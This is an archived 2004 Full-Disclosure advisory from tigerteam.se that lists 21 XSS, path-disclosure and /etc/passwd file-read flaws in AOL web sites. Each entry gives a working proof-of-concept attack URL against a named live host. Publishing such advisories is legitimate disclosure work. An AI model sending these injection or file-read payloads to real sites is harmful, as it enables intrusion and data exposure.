Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] Multiple vulnerabilities in AOL and AOL affiliate web

from [Michel Blomgren] Network Security [Permanent Link]
Subject: [Full-Disclosure] Multiple vulnerabilities in AOL and AOL affiliate web sites
Date: Sun, 26 Dec 2004 18:58:57 +0100 

              tigerteam.se security advisory - TSEAD-200412-2
                              www.tigerteam.se

     Advisory: Multiple vulnerabilities in AOL and AOL affiliate web sites
         Date: Sat Dec 18 15:47:40 EST 2004
  Application: Multiple AOL web applications were found to be vulnerable
Vulnerability: XSS, Path disclosure, and system file read access
               vulnerabilities
    Reference: TSEAD-200412-2
       Author: Xavier de Leon <xavier@tigerteam.se>


SYNOPSIS

http://www.corp.aol.com/whoweare/mission.shtml


VULNERABILITY

The AOL and AOL affiliate web sites have similar coding practices in some
specific cases, and suffer from the same or similar vulnerabilities.


COMMENT 

I literally went link to link, choosing scripts at random and manually testing
for input validation bugs, XSS, and so on. And so I assume the number of bugs
is actually greater.


DISCOVERY

Xavier de Leon <xavier@tigerteam.se>


EXPLOITATION

1) Description: multiple XSS attacks in "report.adp" script:
   Attack: a) 
http://www.aim.com/help_faq/report.adp?type=><script>alert("fubar")</script>
           b) 
http://www.aim.com/help_faq/report.adp?plat=><script>alert("fubar")</script>
           c) 
http://www.aim.com/help_faq/report.adp?num=><script>alert("fubar")</script>
           d) 
http://www.aim.com/help_faq/report.adp?ver=><script>alert("fubar")</script>
           e) 
http://www.aim.com/help_faq/report.adp?aolp=><script>alert("fubar")</script>

2) Description: XSS attack in help_faq/starting_out's "index.asp" script:
   Attack: a) 
http://www.aim.com/help_faq/starting_out/index.adp?aolp=><script>alert("fubar")</script>

3) Description: XSS attack in "catId" variables on multiple .adp scripts:
   Attack: a) 
http://help.channels.aol.com/article.adp?catId=";><script>alert("fubar")</script>&articleId=0
           b) 
help.channels.aol.com/topic.adp?catId="><script>alert("fubar")</script>&sCId=0

4) Description: Input validation attacks and path disclosure in "file_id"
   variable over multiple scripts:
   Attack: a) http://downloads.aol.com.br/files/incr.php?file_id=-0
           b) http://downloads.aol.com.br/arquivo.php?file_id=(

5) Description: Input validation attacks and path disclosure in
   "busca_resultado.php" script:
   Attack: a) http://downloads.aol.com.br/busca_resultado.php?search_string='

6) Description: Input validation attacks and path disclosure in
   "subcategoria.php" script:
   Attack: a) http://downloads.aol.com.br/subcategoria.php?cat_subs_id='

7) Description: Path disclosure in "wa" script, part of listserv package.
   Attack: a) http://listserv.aol.com/cgi-bin/wa?A2=/bar&L=foo&P=R1

8) Description: XSS attack in "main_redesign.adp" script:
   Attack: a) 
http://aimtoday.aol.com/features/main_redesign.adp?fid=";><script>alert("fubar")</script>
 
9) Description: XSS attack in "price_plan.adp" script:
   Attack: a) 
http://www.aol.ca/tryaol/price_plan.adp?wr_promo=&brand=";><script>alert("fubar")</script>
           b) 
http://www.aol.ca/tryaol/price_plan.adp?wr_promo=";><script>alert("fubar")</script>&brand=

10) Description:  XSS and Path disclosure attack in "object.adp" script:
    Attack: a) 
http://finance.channels.aol.ca/finance/object.adp?channel=&frame=&type=&id=---!><script>alert("fubar")</script><!---&data&title=
            b) 
http://women.channels.aol.ca/preview/object.adp?frame=&type=&id=---!><script>alert("fubar")</script><!---&data=
            c) 
http://sports.channels.aol.ca/sports/object.adp?channel=&frame=&type=&id=---!><script>alert("fubar")</script><!---&data&title=

11) Description: Path disclosures in multiple aol.com.ar scripts:
    Attack: a) http://foros.aol.com.ar/foro.php3?id_foro='
            b) http://foros.aol.com.ar/toplevel.php3?id_top='
            c) http://foros.aol.com.ar/categorias.php3?id_cat='
            d) http://foros.aol.com.ar/subcategoria.php3?id_subcat='

12) Description: XSS attacks in "zonalibre.adp" script:
    Attack: a) 
http://aol.com.ar/CanalesWeb/zonalibre.adp?Canal=&Id=";><script>alert("fubar")</script><!---
            b) 
http://aol.com.ar/CanalesWeb/zonalibre.adp?Canal=<script>alert("fubar")</script>&Id=

13) Description: XSS attacks in "computacion.adp" script:
    Attack: a) 
http://www.aol.com.ar/CanalesWeb/computacion.adp?Canal=<script>alert("fubar")</script>&ID=
            b) 
http://www.aol.com.ar/CanalesWeb/computacion.adp?Canal=&ID=";><script>alert("fubar")</script><!---

14) Description: XSS attack in "aolenvivo.adp" script:
    Attack: a) 
http://www.aol.com.ar/CanalesWeb/aolenvivo.adp?Canal=<script>alert("fubar")</script>&ID=

15) Description: XSS attack in "noticias.adp" script:
    Attack: a) 
http://aol.com.ar/CanalesWeb/noticias.adp?Canal=<script>alert("fubar")</script>&Id=

16) Description: XSS attack in "musica.adp" script:
    Attack: a) 
http://aol.com.ar/CanalesWeb/musica.adp?Canal=<script>alert("fubar")</script>&Id=

17) Description: XSS attack in "deportes.adp" script:
    Attack: a) 
http://www.aol.com.ar/CanalesWeb/deportes.adp?Canal=<script>alert("fubar")</script>&ID=

18) Description: XSS attack in "entretenimientos.adp" script:
    Attack: a) 
http://www.aol.com.ar/CanalesWeb/entretenimientos.adp?Canal=<script>alert("fubar")</script>&ID=

19) Description: System file read access vulnerability in "index.adp" script:
    Attack: a) http://www.aol.com.ar/Goyeneche/index.adp?page=/etc/passwd

20) Description: Path disclosure and XSS attack in "holidaydetails.asp"
    script:
    Attack: a) 
http://travel.aol.com.au/holidays/holidaydetails.asp?HolidayId='
    Attack: b) 
http://travel.aol.com.au/holidays/holidaydetails.asp?HolidayId=";><script>alert("fubar")</script><!---

21) Description: Path disclosure attacks in "flightreturnsearch.asp" script:
    Attack: a) 
http://travel.aol.com.au/flights/flightreturnsearch.asp?FLTStartDate1Month='
            b) 
http://travel.aol.com.au/flights/flightreturnsearch.asp?FLTEndDate1Month='


ACKNOWLEDGMENTS

I would like to thank the following people in no particular order:
Michel + all my brothers in p-e and uDc, you know who you are.


ABOUT TIGERTEAM.SE

tigerteam.se offers spearhead competence within the areas of vulnerability
assessment, penetration testing, security implementation, and advanced ethical
hacking training. tigerteam.se consists of Michel Blomgren - company owner (M.
Blomgren IT Security) and Xavier de Leon - freelancing IT security consultant.
Together we have worked for organizations in over 15 countries.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-Disclosure] Multiple vulnerabilities in AOL and AOL affiliate web sites, Michel Blomgren <=
Previous by Date:  [Full-Disclosure] Any study on patch availability?, sudhakar+fulldisclosure
Next by Date:  RE: [spam] Re: [Full-Disclosure] This sums up Yahoo!s security policy to a -T-, J.A. Terranson
Previous by Thread:  [Full-Disclosure] Any study on patch availability?, sudhakar+fulldisclosure
Next by Thread:  [Full-Disclosure] [HAT-SQUAD] NetCat Remote Critical Vulnerability, Poc inside., class 101
Indexes:  [Date] [Thread] [Top] [All Lists]